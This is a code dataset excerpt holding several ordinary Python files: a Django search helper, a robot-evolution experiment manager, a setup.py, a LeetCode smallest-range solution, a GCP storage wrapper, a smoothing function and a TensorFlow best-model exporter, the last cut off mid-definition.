Dataset columns (name: type, string length range):
  repo_name: string, 7-94
  repo_path: string, 4-237
  repo_head_hexsha: string, 40
  content: string, 10-680k
  apis: string, 2-680k
ruslan-ok/ServerApps
apart/search.py
541aa12f1933054a12f590ce78544178be374669
from django.db.models import Q

from hier.search import SearchResult
from .models import app_name, Apart, Meter, Bill, Service, Price


def search(user, query):
    result = SearchResult(query)

    lookups = Q(name__icontains=query) | Q(addr__icontains=query)
    items = Apart.objects.filter(user=user.id).filter(lookups)
    for item in items:
        result.add(app_name, 'apart', item.id, None, item.name, item.addr, False)

    lookups = Q(info__icontains=query)
    items = Meter.objects.filter(apart__user=user.id).filter(lookups)
    for item in items:
        result.add(app_name, 'meter', item.id, item.reading.date(), item.name(), item.info,
                   False, item.apart.name, item.period.strftime('%m.%Y'))

    lookups = Q(info__icontains=query) | Q(url__icontains=query)
    items = Bill.objects.filter(apart__user=user.id).filter(lookups)
    for item in items:
        result.add(app_name, 'bill', item.id, item.payment.date(), item.name(), item.info,
                   False, item.apart.name, item.period.strftime('%m.%Y'))

    lookups = Q(name__icontains=query) | Q(abbr__icontains=query)
    items = Service.objects.filter(apart__user=user.id).filter(lookups)
    for item in items:
        result.add(app_name, 'service', item.id, None, item.name, item.abbr, False, item.apart.name)

    lookups = Q(info__icontains=query)
    items = Price.objects.filter(apart__user=user.id).filter(lookups)
    for item in items:
        result.add(app_name, 'price', item.id, item.start, item.name(), item.info, False, item.apart.name)

    return result.items
[((172, 191), 'hier.search.SearchResult', 'SearchResult', (['query'], {}), '(query)\n', (184, 191), False, 'from hier.search import SearchResult\n'), ((448, 472), 'django.db.models.Q', 'Q', ([], {'info__icontains': 'query'}), '(info__icontains=query)\n', (449, 472), False, 'from django.db.models import Q\n'), ((1301, 1325), 'django.db.models.Q', 'Q', ([], {'info__icontains': 'query'}), '(info__icontains=query)\n', (1302, 1325), False, 'from django.db.models import Q\n'), ((211, 235), 'django.db.models.Q', 'Q', ([], {'name__icontains': 'query'}), '(name__icontains=query)\n', (212, 235), False, 'from django.db.models import Q\n'), ((238, 262), 'django.db.models.Q', 'Q', ([], {'addr__icontains': 'query'}), '(addr__icontains=query)\n', (239, 262), False, 'from django.db.models import Q\n'), ((730, 754), 'django.db.models.Q', 'Q', ([], {'info__icontains': 'query'}), '(info__icontains=query)\n', (731, 754), False, 'from django.db.models import Q\n'), ((757, 780), 'django.db.models.Q', 'Q', ([], {'url__icontains': 'query'}), '(url__icontains=query)\n', (758, 780), False, 'from django.db.models import Q\n'), ((1036, 1060), 'django.db.models.Q', 'Q', ([], {'name__icontains': 'query'}), '(name__icontains=query)\n', (1037, 1060), False, 'from django.db.models import Q\n'), ((1063, 1087), 'django.db.models.Q', 'Q', ([], {'abbr__icontains': 'query'}), '(abbr__icontains=query)\n', (1064, 1087), False, 'from django.db.models import Q\n')]
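A minimal sketch (illustrative, not part of the repository) of the lookup pattern that search() above repeats for every model: OR two case-insensitive __icontains filters together with Q objects, then chain them onto the per-user queryset.

from django.db.models import Q

def apart_lookups(query):
    # Match rows whose name OR address contains the query, ignoring case.
    return Q(name__icontains=query) | Q(addr__icontains=query)

# Usage, with the Apart model from the file above:
# Apart.objects.filter(user=user.id).filter(apart_lookups('main street'))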
MRebolle/Battery-Robot
pyrevolve/experiment_management.py
1b97e8c77cf7eff7d5cc7e417b4e5ec97e4011e7
import os
import shutil
import numpy as np
from pyrevolve.custom_logging.logger import logger
import sys


class ExperimentManagement:
    # ids of robots in the name of all types of files are always phenotype ids, and the standard for id is 'robot_ID'
    def __init__(self, settings):
        self.settings = settings
        manager_folder = os.path.dirname(self.settings.manager)
        self._experiment_folder = os.path.join(manager_folder, 'data', self.settings.experiment_name, self.settings.run)
        self._data_folder = os.path.join(self._experiment_folder, 'data_fullevolution')
        self._gen_num = 0

    def create_exp_folders(self):
        if os.path.exists(self.experiment_folder):
            shutil.rmtree(self.experiment_folder)
        os.makedirs(self.experiment_folder)
        os.mkdir(self.data_folder)
        folders = ['genotypes', 'phenotypes', 'descriptors', 'objectives', 'fitness', 'battery',
                   'phenotype_images', 'failed_eval_robots']
        for folder in folders:
            os.mkdir(os.path.join(self.data_folder, folder))

    @property
    def experiment_folder(self):
        return self._experiment_folder

    @property
    def data_folder(self):
        return self._data_folder

    def export_genotype(self, individual):
        if self.settings.recovery_enabled:
            individual.export_genotype(self.data_folder)

    def export_phenotype(self, individual):
        if self.settings.export_phenotype:
            individual.export_phenotype(self.data_folder)

    def export_fitnesses(self, individuals):
        folder = self.data_folder
        for individual in individuals:
            individual.export_fitness(folder)

    def export_fitness(self, individual):
        folder = os.path.join(self.data_folder, 'fitness')
        individual.export_fitness(folder)

    def export_objectives(self, individual):
        folder = os.path.join(self.data_folder, 'objectives')
        individual.export_objectives(folder)

    def export_battery(self, individual):
        folder = os.path.join(self.data_folder, 'battery')
        individual.export_battery(folder)

    def export_behavior_measures(self, _id, measures):
        filename = os.path.join(self.data_folder, 'descriptors', f'behavior_desc_{_id}.txt')
        with open(filename, "w") as f:
            if measures is None:
                f.write(str(None))
            else:
                for key, val in measures.items():
                    f.write(f"{key} {val}\n")

    def export_phenotype_images(self, dirpath, individual):
        individual.phenotype.render_body(os.path.join(self.experiment_folder, dirpath, f'body_{individual.phenotype.id}.png'))
        individual.phenotype.render_brain(os.path.join(self.experiment_folder, dirpath, f'brain_{individual.phenotype.id}.png'))

    def export_failed_eval_robot(self, individual):
        individual.genotype.export_genotype(os.path.join(self.data_folder, 'failed_eval_robots', f'genotype_{individual.phenotype.id}.txt'))
        individual.phenotype.save_file(os.path.join(self.data_folder, 'failed_eval_robots', f'phenotype_{individual.phenotype.id}.yaml'))
        individual.phenotype.save_file(os.path.join(self.data_folder, 'failed_eval_robots', f'phenotype_{individual.phenotype.id}.sdf'), conf_type='sdf')

    def export_snapshots(self, individuals, gen_num):
        self._gen_num = gen_num
        if self.settings.recovery_enabled:
            path = os.path.join(self.experiment_folder, f'selectedpop_{gen_num}')
            if os.path.exists(path):
                shutil.rmtree(path)
            os.mkdir(path)
        for ind in individuals:
            self.export_phenotype_images(f'selectedpop_{str(gen_num)}', ind)
        logger.info(f'Exported snapshot {str(gen_num)} with {str(len(individuals))} individuals')

    def experiment_is_new(self):
        if not os.path.exists(self.experiment_folder):
            return True
        path, dirs, files = next(os.walk(os.path.join(self.data_folder, 'fitness')))
        if len(files) == 0:
            return True
        else:
            return False

    def read_recovery_state(self, population_size, offspring_size):
        snapshots = []
        for r, d, f in os.walk(self.experiment_folder):
            for dir in d:
                if 'selectedpop' in dir:
                    exported_files = len([name for name in os.listdir(os.path.join(self.experiment_folder, dir))
                                          if os.path.isfile(os.path.join(self.experiment_folder, dir, name))])
                    if exported_files == (population_size * 2):  # body and brain files
                        snapshots.append(int(dir.split('_')[1]))

        if len(snapshots) > 0:
            # the latest complete snapshot
            last_snapshot = np.sort(snapshots)[-1]
            # number of robots expected until the snapshot
            n_robots = population_size + last_snapshot * offspring_size
        else:
            last_snapshot = -1
            n_robots = 0

        robot_ids = []
        for r, d, f in os.walk(os.path.join(self.data_folder, 'fitness')):
            for file in f:
                robot_ids.append(int(file.split('.')[0].split('_')[-1]))
        last_id = np.sort(robot_ids)[-1]

        # if there are more robots to recover than the number expected in this snapshot
        if last_id > n_robots:
            # then recover also this partial offspring
            has_offspring = True
        else:
            has_offspring = False

        return last_snapshot, has_offspring, last_id + 1

    def plot_path(self, data_source: str, filename: str, file_extension=".png"):
        data_folder = os.path.join(self._data_folder, data_source)
        if not os.path.exists(data_folder):
            os.mkdir(data_folder)
        return os.path.join(data_folder, filename + str(self._gen_num) + file_extension)
[((346, 384), 'os.path.dirname', 'os.path.dirname', (['self.settings.manager'], {}), '(self.settings.manager)\n', (361, 384), False, 'import os\n'), ((419, 510), 'os.path.join', 'os.path.join', (['manager_folder', '"""data"""', 'self.settings.experiment_name', 'self.settings.run'], {}), "(manager_folder, 'data', self.settings.experiment_name, self.\n settings.run)\n", (431, 510), False, 'import os\n'), ((534, 593), 'os.path.join', 'os.path.join', (['self._experiment_folder', '"""data_fullevolution"""'], {}), "(self._experiment_folder, 'data_fullevolution')\n", (546, 593), False, 'import os\n'), ((666, 704), 'os.path.exists', 'os.path.exists', (['self.experiment_folder'], {}), '(self.experiment_folder)\n', (680, 704), False, 'import os\n'), ((764, 799), 'os.makedirs', 'os.makedirs', (['self.experiment_folder'], {}), '(self.experiment_folder)\n', (775, 799), False, 'import os\n'), ((808, 834), 'os.mkdir', 'os.mkdir', (['self.data_folder'], {}), '(self.data_folder)\n', (816, 834), False, 'import os\n'), ((1763, 1804), 'os.path.join', 'os.path.join', (['self.data_folder', '"""fitness"""'], {}), "(self.data_folder, 'fitness')\n", (1775, 1804), False, 'import os\n'), ((1910, 1954), 'os.path.join', 'os.path.join', (['self.data_folder', '"""objectives"""'], {}), "(self.data_folder, 'objectives')\n", (1922, 1954), False, 'import os\n'), ((2060, 2101), 'os.path.join', 'os.path.join', (['self.data_folder', '"""battery"""'], {}), "(self.data_folder, 'battery')\n", (2072, 2101), False, 'import os\n'), ((2219, 2292), 'os.path.join', 'os.path.join', (['self.data_folder', '"""descriptors"""', 'f"""behavior_desc_{_id}.txt"""'], {}), "(self.data_folder, 'descriptors', f'behavior_desc_{_id}.txt')\n", (2231, 2292), False, 'import os\n'), ((4253, 4284), 'os.walk', 'os.walk', (['self.experiment_folder'], {}), '(self.experiment_folder)\n', (4260, 4284), False, 'import os\n'), ((5671, 5715), 'os.path.join', 'os.path.join', (['self._data_folder', 'data_source'], {}), '(self._data_folder, data_source)\n', (5683, 5715), False, 'import os\n'), ((718, 755), 'shutil.rmtree', 'shutil.rmtree', (['self.experiment_folder'], {}), '(self.experiment_folder)\n', (731, 755), False, 'import shutil\n'), ((2616, 2704), 'os.path.join', 'os.path.join', (['self.experiment_folder', 'dirpath', 'f"""body_{individual.phenotype.id}.png"""'], {}), "(self.experiment_folder, dirpath,\n f'body_{individual.phenotype.id}.png')\n", (2628, 2704), False, 'import os\n'), ((2744, 2833), 'os.path.join', 'os.path.join', (['self.experiment_folder', 'dirpath', 'f"""brain_{individual.phenotype.id}.png"""'], {}), "(self.experiment_folder, dirpath,\n f'brain_{individual.phenotype.id}.png')\n", (2756, 2833), False, 'import os\n'), ((2928, 3027), 'os.path.join', 'os.path.join', (['self.data_folder', '"""failed_eval_robots"""', 'f"""genotype_{individual.phenotype.id}.txt"""'], {}), "(self.data_folder, 'failed_eval_robots',\n f'genotype_{individual.phenotype.id}.txt')\n", (2940, 3027), False, 'import os\n'), ((3064, 3165), 'os.path.join', 'os.path.join', (['self.data_folder', '"""failed_eval_robots"""', 'f"""phenotype_{individual.phenotype.id}.yaml"""'], {}), "(self.data_folder, 'failed_eval_robots',\n f'phenotype_{individual.phenotype.id}.yaml')\n", (3076, 3165), False, 'import os\n'), ((3202, 3302), 'os.path.join', 'os.path.join', (['self.data_folder', '"""failed_eval_robots"""', 'f"""phenotype_{individual.phenotype.id}.sdf"""'], {}), "(self.data_folder, 'failed_eval_robots',\n f'phenotype_{individual.phenotype.id}.sdf')\n", (3214, 3302), False, 'import 
os\n'), ((3466, 3528), 'os.path.join', 'os.path.join', (['self.experiment_folder', 'f"""selectedpop_{gen_num}"""'], {}), "(self.experiment_folder, f'selectedpop_{gen_num}')\n", (3478, 3528), False, 'import os\n'), ((3544, 3564), 'os.path.exists', 'os.path.exists', (['path'], {}), '(path)\n', (3558, 3564), False, 'import os\n'), ((3614, 3628), 'os.mkdir', 'os.mkdir', (['path'], {}), '(path)\n', (3622, 3628), False, 'import os\n'), ((3897, 3935), 'os.path.exists', 'os.path.exists', (['self.experiment_folder'], {}), '(self.experiment_folder)\n', (3911, 3935), False, 'import os\n'), ((5070, 5111), 'os.path.join', 'os.path.join', (['self.data_folder', '"""fitness"""'], {}), "(self.data_folder, 'fitness')\n", (5082, 5111), False, 'import os\n'), ((5232, 5250), 'numpy.sort', 'np.sort', (['robot_ids'], {}), '(robot_ids)\n', (5239, 5250), True, 'import numpy as np\n'), ((5731, 5758), 'os.path.exists', 'os.path.exists', (['data_folder'], {}), '(data_folder)\n', (5745, 5758), False, 'import os\n'), ((5772, 5793), 'os.mkdir', 'os.mkdir', (['data_folder'], {}), '(data_folder)\n', (5780, 5793), False, 'import os\n'), ((1046, 1084), 'os.path.join', 'os.path.join', (['self.data_folder', 'folder'], {}), '(self.data_folder, folder)\n', (1058, 1084), False, 'import os\n'), ((3582, 3601), 'shutil.rmtree', 'shutil.rmtree', (['path'], {}), '(path)\n', (3595, 3601), False, 'import shutil\n'), ((4002, 4043), 'os.path.join', 'os.path.join', (['self.data_folder', '"""fitness"""'], {}), "(self.data_folder, 'fitness')\n", (4014, 4043), False, 'import os\n'), ((4790, 4808), 'numpy.sort', 'np.sort', (['snapshots'], {}), '(snapshots)\n', (4797, 4808), True, 'import numpy as np\n'), ((4423, 4464), 'os.path.join', 'os.path.join', (['self.experiment_folder', 'dir'], {}), '(self.experiment_folder, dir)\n', (4435, 4464), False, 'import os\n'), ((4484, 4531), 'os.path.join', 'os.path.join', (['self.experiment_folder', 'dir', 'name'], {}), '(self.experiment_folder, dir, name)\n', (4496, 4531), False, 'import os\n')]
nudglabs/books-python-wrappers
books/model/Instrumentation.py
8844eca8fe681542644a70749b72a6dc4e48c171
#$Id$

class Instrumentation:
    """This class is used to create an object for instrumentation."""

    def __init__(self):
        """Initialize parameters for Instrumentation object."""
        self.query_execution_time = ''
        self.request_handling_time = ''
        self.response_write_time = ''
        self.page_context_write_time = ''

    def set_query_execution_time(self, query_execution_time):
        """Set query execution time.

        Args:
            query_execution_time(str): Query execution time.
        """
        self.query_execution_time = query_execution_time

    def get_query_execution_time(self):
        """Get query execution time.

        Returns:
            str: Query execution time.
        """
        return self.query_execution_time

    def set_request_handling_time(self, request_handling_time):
        """Set request handling time.

        Args:
            request_handling_time(str): Request handling time.
        """
        self.request_handling_time = request_handling_time

    def get_request_handling_time(self):
        """Get request handling time.

        Returns:
            str: Request handling time.
        """
        return self.request_handling_time

    def set_response_write_time(self, response_write_time):
        """Set response write time.

        Args:
            response_write_time(str): Response write time.
        """
        self.response_write_time = response_write_time

    def get_response_write_time(self):
        """Get response write time.

        Returns:
            str: Response write time.
        """
        return self.response_write_time

    def set_page_context_write_time(self, page_context_write_time):
        """Set page context write time.

        Args:
            page_context_write_time(str): Page context write time.
        """
        self.page_context_write_time = page_context_write_time

    def get_page_context_write_time(self):
        """Get page context write time.

        Returns:
            str: Page context write time.
        """
        return self.page_context_write_time
[]
sophiaalthammer/parm
DPR/setup.py
ecf2dce5ee225b18e1ed3736a86696cc81e0797c
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.

from setuptools import setup

with open("README.md") as f:
    readme = f.read()

setup(
    name="dpr",
    version="0.1.0",
    description="Facebook AI Research Open Domain Q&A Toolkit",
    url="https://github.com/facebookresearch/DPR/",
    classifiers=[
        "Intended Audience :: Science/Research",
        "License :: OSI Approved :: MIT License",
        "Programming Language :: Python :: 3.6",
        "Topic :: Scientific/Engineering :: Artificial Intelligence",
    ],
    long_description=readme,
    long_description_content_type="text/markdown",
    setup_requires=[
        "setuptools>=18.0",
    ],
    install_requires=[
        "cython",
        "faiss-cpu>=1.6.1",
        "filelock",
        "numpy",
        "regex",
        "torch>=1.2.0",
        "transformers>=3.0.0,<3.1.0",
        "tqdm>=4.27",
        "wget",
        "spacy>=2.1.8",
    ],
)
[((284, 941), 'setuptools.setup', 'setup', ([], {'name': '"""dpr"""', 'version': '"""0.1.0"""', 'description': '"""Facebook AI Research Open Domain Q&A Toolkit"""', 'url': '"""https://github.com/facebookresearch/DPR/"""', 'classifiers': "['Intended Audience :: Science/Research',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python :: 3.6',\n 'Topic :: Scientific/Engineering :: Artificial Intelligence']", 'long_description': 'readme', 'long_description_content_type': '"""text/markdown"""', 'setup_requires': "['setuptools>=18.0']", 'install_requires': "['cython', 'faiss-cpu>=1.6.1', 'filelock', 'numpy', 'regex', 'torch>=1.2.0',\n 'transformers>=3.0.0,<3.1.0', 'tqdm>=4.27', 'wget', 'spacy>=2.1.8']"}), "(name='dpr', version='0.1.0', description=\n 'Facebook AI Research Open Domain Q&A Toolkit', url=\n 'https://github.com/facebookresearch/DPR/', classifiers=[\n 'Intended Audience :: Science/Research',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python :: 3.6',\n 'Topic :: Scientific/Engineering :: Artificial Intelligence'],\n long_description=readme, long_description_content_type='text/markdown',\n setup_requires=['setuptools>=18.0'], install_requires=['cython',\n 'faiss-cpu>=1.6.1', 'filelock', 'numpy', 'regex', 'torch>=1.2.0',\n 'transformers>=3.0.0,<3.1.0', 'tqdm>=4.27', 'wget', 'spacy>=2.1.8'])\n", (289, 941), False, 'from setuptools import setup\n')]
BillionsRichard/pycharmWorkspace
leetcode/hard/smallest_range/srcs/a_with_ordered_dict.py
709e2681fc6d85ff52fb25717215a365f51073aa
# encoding: utf-8
"""
@version: v1.0
@author: Richard
@license: Apache Licence
@contact: [email protected]
@site:
@software: PyCharm
@time: 2019/9/12 20:37
"""
from pprint import pprint as pp
from operator import itemgetter
import time
from collections import OrderedDict

from hard.smallest_range.srcs.big_2d_list import BIG_LIST_85
from hard.smallest_range.srcs.big_2d_list import BIG_LIST_86


class Solution:
    """
    Input:  [[4,10,15,24,26], [0,9,12,20], [5,18,22,30]]
    Output: [20,24]
    """

    def smallestRange(self, nums):
        start_time = time.time()
        k = len(nums)
        print('k-->', k)
        # merge all k lists into (value, list-index) pairs, sorted by value
        k_tagged_merged_list = []
        for i in range(k):
            row = nums[i]
            k_tagged_merged_list.extend([(e, i) for e in row])
        k_tagged_merged_list.sort(key=itemgetter(0))
        sort_end_time = time.time()
        print('sorting time:', sort_end_time - start_time)
        # print(k_tagged_merged_list)

        od = OrderedDict()
        min_range = None
        min_range_len = int(2e5)
        # print('min_range_len', min_range_len)
        tot_len = len(k_tagged_merged_list)
        # print('tot_len', tot_len)
        i = 0
        while i < tot_len:
            this_tag = k_tagged_merged_list[i][1]
            cur_tag_set = od.keys()
            if this_tag in cur_tag_set:
                od.pop(this_tag)
            od[this_tag] = k_tagged_merged_list[i][0]
            tags = od.keys()
            # print('len_k_dque-->', len(k_dque))
            # print('len_k_dque_tags-->', len(k_dque_tags))
            if len(tags) == k:
                keys = list(od.keys())
                first_v = od[keys[0]]
                last_v = od[keys[-1]]
                k_range_len = last_v - first_v
                if k_range_len < min_range_len:
                    min_range_len = k_range_len
                    min_range = first_v, last_v
            i += 1
        print('ending main time:', time.time() - sort_end_time)
        return min_range


if __name__ == '__main__':
    s = Solution()
    nums = [[4, 10, 15, 24, 26], [0, 9, 12, 20], [5, 18, 22, 30]]
    # nums = [[10], [11]]
    # nums = [[11,38,83,
    # 84,84,85,88,89,89,92],[28,61,89],[52,77,79,80,81],[21,25,26,26,26,27],[9,83,85,90],[84,85,87],[26,68,70,71],[36,40,41,42,45],[-34,21],[-28,-28,-23,1,13,21,28,37,37,38],[-74,1,2,22,33,35,43,45],[54,96,98,98,99],[43,54,60,65,71,75],[43,46],[50,50,58,67,69],[7,14,15],[78,80,89,89,90],[35,47,63,69,77,92,94]]
    # [-74, 1, 2, 22, 33, 35, 43, 45], [54, 96, 98, 98, 99], [43, 54, 60, 65, 71, 75], [43, 46],
    # [50, 50, 58, 67, 69], [7, 14, 15], [78, 80, 89, 89, 90], [35, 47, 63, 69, 77, 92, 94]]
    nums = BIG_LIST_85
    # nums = BIG_LIST_86
    min_range = s.smallestRange(nums)
    print(min_range)
[((571, 582), 'time.time', 'time.time', ([], {}), '()\n', (580, 582), False, 'import time\n'), ((858, 869), 'time.time', 'time.time', ([], {}), '()\n', (867, 869), False, 'import time\n'), ((981, 994), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (992, 994), False, 'from collections import OrderedDict\n'), ((819, 832), 'operator.itemgetter', 'itemgetter', (['(0)'], {}), '(0)\n', (829, 832), False, 'from operator import itemgetter\n'), ((1972, 1983), 'time.time', 'time.time', ([], {}), '()\n', (1981, 1983), False, 'import time\n')]
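A quick way to sanity-check the example in the class docstring above (hypothetical driver, assuming the Solution class is importable from this module):

s = Solution()
print(s.smallestRange([[4, 10, 15, 24, 26], [0, 9, 12, 20], [5, 18, 22, 30]]))
# the docstring above expects the range (20, 24)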
davidyum/Particle-Cloud-Framework
pcf/particle/gcp/storage/storage.py
f6325a60a3838f86bd73bf4071438e12f9c68f8d
from pcf.core.gcp_resource import GCPResource from pcf.core import State import logging from google.cloud import storage from google.cloud import exceptions logger = logging.getLogger(__name__) class Storage(GCPResource): """ This is the implementation of Google's storage service. """ flavor = "storage" equivalent_states = { State.running: 1, State.stopped: 0, State.terminated: 0 } UNIQUE_KEYS = ["gcp_resource.name"] def __init__(self, particle_definition): super(Storage, self).__init__(particle_definition=particle_definition, resource=storage) self.bucket_name = self.desired_state_definition["name"] self._set_unique_keys() def _set_unique_keys(self): """ Logic that sets keys from state definition that are used to uniquely identify the storage bucket """ self.unique_keys = Storage.UNIQUE_KEYS def get_status(self): """ Determines if the bucket exists Returns: status (dict) """ try: bucket = self.client.get_bucket(self.bucket_name) return bucket except exceptions.NotFound: return {"status": "missing"} def _terminate(self): """ Deletes the storage bucket Returns: response of gcp delete """ return self.client.bucket(bucket_name=self.bucket_name).delete() def _start(self): """ Creates the storage bucket Returns: response of create_bucket """ # create_definition = pcf_util.keep_and_replace_keys(self.get_desired_state_definition(), # S3Bucket.START_PARAMS) return self.client.bucket(bucket_name=self.bucket_name).create() def _stop(self): """ S3 bucket does not have a stopped state so it calls terminate. """ return self.terminate() def sync_state(self): """ Calls get status and then sets the current state. """ full_status = self.get_status() if full_status: if isinstance(full_status, self.resource.Bucket): self.state = State.running else: self.state = State.terminated self.current_state_definition = self.desired_state_definition def download_object(self, blob_name, file_obj, **kwargs): """ Downloads a file from the S3 bucket. Args: blob_name (str): Object name (Required) file_obj (str): file name for the download (Required) **kwargs: Options for boto3 get_object (optional) """ bucket = self.client.get_bucket(self.bucket_name) return self.resource.Blob(blob_name, bucket).download_file(file_obj, **kwargs) def delete_object(self, blob_name): """ Deletes an object in the storage bucket. Args: blob_name (str): Object Key name (Required) """ bucket = self.client.get_bucket(self.bucket_name) return bucket.delete_blob(blob_name) def list_objects(self, **kwargs): """ Lists all objects in the storage bucket. Args: **kwargs: Options for boto3 list_objects (optional) """ bucket = self.client.get_bucket(self.bucket_name) return list(bucket.list_blobs(**kwargs)) def put_object(self, blob_name, file_obj, **kwargs): """ Puts an object in the S3 bucket. Args: blob_name (str): Object Key name (Required) file_obj (object): the object to put into the bucket (Required) **kwargs: Options for boto3 put_object (optional) """ bucket = self.client.get_bucket(self.bucket_name) return self.resource.Blob(blob_name, bucket).upload_from_file(file_obj, **kwargs) def put_file(self, blob_name, file, **kwargs): """ Puts a file in the S3 bucket. 
Args: blob_name (str): Object Key name (Required) file (file): the file to put into the bucket (Required) **kwargs: Options for boto3 upload_file (optional) """ bucket = self.client.get_bucket(self.bucket_name) return self.resource.Blob(blob_name, bucket).upload_from_filename(file, **kwargs) def _update(self): """ Not Implemented """ pass def is_state_equivalent(self, state1, state2): """ Determines if states are equivalent. Uses equivalent_states defined in the S3Bucket class. Args: state1 (State): state1 (State): Returns: bool """ return Storage.equivalent_states.get(state1) == Storage.equivalent_states.get(state2)
[((167, 194), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (184, 194), False, 'import logging\n')]
CIMCB/cimcb
cimcb/utils/smooth.py
5d30f80423ed94e1068871b30e465b38d451581a
import numpy as np


def smooth(a, WSZ):
    # a: NumPy 1-D array containing the data to be smoothed
    # WSZ: smoothing window size, which must be an odd number,
    #      as in the original MATLAB implementation
    if WSZ % 2 == 0:
        WSZ = WSZ - 1
    out0 = np.convolve(a, np.ones(WSZ, dtype=int), 'valid') / WSZ
    r = np.arange(1, WSZ - 1, 2)
    start = np.cumsum(a[:WSZ - 1])[::2] / r
    stop = (np.cumsum(a[:-WSZ:-1])[::2] / r)[::-1]
    return np.concatenate((start, out0, stop))
[((331, 355), 'numpy.arange', 'np.arange', (['(1)', '(WSZ - 1)', '(2)'], {}), '(1, WSZ - 1, 2)\n', (340, 355), True, 'import numpy as np\n'), ((462, 497), 'numpy.concatenate', 'np.concatenate', (['(start, out0, stop)'], {}), '((start, out0, stop))\n', (476, 497), True, 'import numpy as np\n'), ((283, 306), 'numpy.ones', 'np.ones', (['WSZ'], {'dtype': 'int'}), '(WSZ, dtype=int)\n', (290, 306), True, 'import numpy as np\n'), ((368, 390), 'numpy.cumsum', 'np.cumsum', (['a[:WSZ - 1]'], {}), '(a[:WSZ - 1])\n', (377, 390), True, 'import numpy as np\n'), ((412, 434), 'numpy.cumsum', 'np.cumsum', (['a[:-WSZ:-1]'], {}), '(a[:-WSZ:-1])\n', (421, 434), True, 'import numpy as np\n')]
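A short usage sketch for the helper above (not part of the package; the import path is inferred from the file location). Interior points become centered moving averages, while the points near the edges are averaged over progressively smaller windows:

import numpy as np
from cimcb.utils.smooth import smooth  # assumed import path

y = np.array([1.0, 2.0, 4.0, 8.0, 16.0])
print(smooth(y, 3))  # approximately [1.  2.33  4.67  9.33  16.]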
jmarine/ezeeai
ezeeai/core/extensions/best_exporter.py
091b4ce3bc5794c534084bff3301b15ba8a9be1a
from __future__ import absolute_import import abc import os import json import glob import shutil from tensorflow.python.estimator import gc from tensorflow.python.estimator import util from tensorflow.python.estimator.canned import metric_keys from tensorflow.python.framework import errors_impl from tensorflow.python.platform import gfile from tensorflow.python.platform import tf_logging from tensorflow.python.summary import summary_iterator from tensorflow.python.estimator.exporter import Exporter, _SavedModelExporter def _verify_compare_fn_args(compare_fn): """Verifies compare_fn arguments.""" args = set(util.fn_args(compare_fn)) if 'best_eval_result' not in args: raise ValueError( 'compare_fn (%s) must include best_eval_result argument.' % compare_fn) if 'current_eval_result' not in args: raise ValueError( 'compare_fn (%s) must include current_eval_result argument.' % compare_fn) non_valid_args = list(args - set(['best_eval_result', 'current_eval_result'])) if non_valid_args: raise ValueError('compare_fn (%s) has following not expected args: %s' % (compare_fn, non_valid_args)) def _loss_smaller(best_eval_result, current_eval_result): """Compares two evaluation results and returns true if the 2nd one is smaller. Both evaluation results should have the values for MetricKeys.LOSS, which are used for comparison. Args: best_eval_result: best eval metrics. current_eval_result: current eval metrics. Returns: True if the loss of current_eval_result is smaller; otherwise, False. Raises: ValueError: If input eval result is None or no loss is available. """ default_key = metric_keys.MetricKeys.LOSS if not best_eval_result or default_key not in best_eval_result: raise ValueError( 'best_eval_result cannot be empty or no loss is found in it.') if not current_eval_result or default_key not in current_eval_result: raise ValueError( 'current_eval_result cannot be empty or no loss is found in it.') return best_eval_result[default_key] > current_eval_result[default_key] class BestExporter(Exporter): """This class exports the serving graph and checkpoints of the best models. This class performs a model export everytime when the new model is better than any exsiting model. """ def __init__(self, name='best_exporter', serving_input_receiver_fn=None, event_file_pattern='eval/*.tfevents.*', compare_fn=_loss_smaller, assets_extra=None, as_text=False, exports_to_keep=5): """Create an `Exporter` to use with `tf.estimator.EvalSpec`. Example of creating a BestExporter for training and evluation: ```python def make_train_and_eval_fn(): # Set up feature columns. categorial_feature_a = ( tf.feature_column.categorical_column_with_hash_bucket(...)) categorial_feature_a_emb = embedding_column( categorical_column=categorial_feature_a, ...) ... # other feature columns estimator = tf.estimator.DNNClassifier( config=tf.estimator.RunConfig( model_dir='/my_model', save_summary_steps=100), feature_columns=[categorial_feature_a_emb, ...], hidden_units=[1024, 512, 256]) serving_feature_spec = tf.feature_column.make_parse_example_spec( categorial_feature_a_emb) serving_input_receiver_fn = ( tf.estimator.export.build_parsing_serving_input_receiver_fn( serving_feature_spec)) exporter = tf.estimator.BestExporter( name="best_exporter", serving_input_receiver_fn=serving_input_receiver_fn, exports_to_keep=5) train_spec = tf.estimator.TrainSpec(...) 
eval_spec = [tf.estimator.EvalSpec( input_fn=eval_input_fn, steps=100, exporters=exporter, start_delay_secs=0, throttle_secs=5)] return tf.estimator.DistributedTrainingSpec(estimator, train_spec, eval_spec) ``` Args: name: unique name of this `Exporter` that is going to be used in the export path. serving_input_receiver_fn: a function that takes no arguments and returns a `ServingInputReceiver`. event_file_pattern: event file name pattern relative to model_dir. If None, however, the exporter would not be preemption-safe. To bex preemption-safe, event_file_pattern should be specified. compare_fn: a function that compares two evaluation results and returns true if current evaluation result is better. Follows the signature: * Args: * `best_eval_result`: This is the evaluation result of the best model. * `current_eval_result`: This is the evaluation result of current candidate model. * Returns: True if current evaluation result is better; otherwise, False. assets_extra: An optional dict specifying how to populate the assets.extra directory within the exported SavedModel. Each key should give the destination path (including the filename) relative to the assets.extra directory. The corresponding value gives the full path of the source file to be copied. For example, the simple case of copying a single file without renaming it is specified as `{'my_asset_file.txt': '/path/to/my_asset_file.txt'}`. as_text: whether to write the SavedModel proto in text format. Defaults to `False`. exports_to_keep: Number of exports to keep. Older exports will be garbage-collected. Defaults to 5. Set to `None` to disable garbage collection. Raises: ValueError: if any arguments is invalid. """ self._compare_fn = compare_fn if self._compare_fn is None: raise ValueError('`compare_fn` must not be None.') _verify_compare_fn_args(self._compare_fn) self._saved_model_exporter = _SavedModelExporter( name, serving_input_receiver_fn, assets_extra, as_text) self._event_file_pattern = event_file_pattern self._model_dir = None self._best_eval_result = None self._exports_to_keep = exports_to_keep self._log = {} if exports_to_keep is not None and exports_to_keep <= 0: raise ValueError( '`exports_to_keep`, if provided, must be positive number') @property def name(self): return self._saved_model_exporter.name def export(self, estimator, export_path, checkpoint_path, eval_result, 